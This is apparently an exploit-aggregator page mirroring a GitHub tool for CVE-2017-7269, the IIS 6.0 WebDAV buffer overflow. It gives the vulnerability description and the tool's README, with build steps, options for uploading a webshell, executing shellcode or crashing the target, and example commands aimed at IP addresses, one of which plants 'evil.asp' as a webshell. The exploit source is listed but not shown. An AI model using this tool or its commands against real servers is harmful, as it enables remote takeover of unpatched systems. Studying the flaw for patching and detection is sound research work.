CVE-2017-7269 PoC — Microsoft Internet Information Services 缓冲区错误漏洞

Source

https://github.com/zcgonvh/cve-2017-7269-tool

Associated Vulnerability

Title:Microsoft Internet Information Services 缓冲区错误漏洞 (CVE-2017-7269)
Description:Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.

Description

CVE-2017-7269 to webshell or shellcode loader

Readme

# cve-2017-7269 webshell and shellcode tool

### build

	csc cve-2017-7269.cs

### usage

	CVE-2017-7269 <url> [parms]

	Header:
	-h <host>       set host for [If] header
	-p <port>       set port for [If] header
	-s <scheme>     set scheme for [If] header
	-l <length>     length of physical path
	
	WebShell:
	-w <webshell>   upload webshell to server
	-wp <shellpath> path of webshell to save
	
	ShellCode:
	-c <shellcode>  execute the shellcode
	
	Misc:
	-t      test vulnerable only.
	-e      exit process when getshell or test
	-k      kill target(equals -e and -t)

### example

	CVE-2017-7269 http://192.168.1.1/
	CVE-2017-7269 http://192.168.1.1/ -l 19
	CVE-2017-7269 http://host.remote/ -h test.local -p 8080 -s https
	CVE-2017-7269 http://192.168.1.1/ -e -l 22 -w evil.asp -wp /webshell.asp
	CVE-2017-7269 http://192.168.1.1/ -c shellcode.bin

File Snapshot


 [4.0K]  /data/pocs/aa48ac73e082a1312654e570a623e822503331f2
├── [ 21K]  CVE-2017-7269.cs
├── [8.8K]  getshell.png
├── [ 856]  README.md
└── [ 29K]  shellcode.png

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!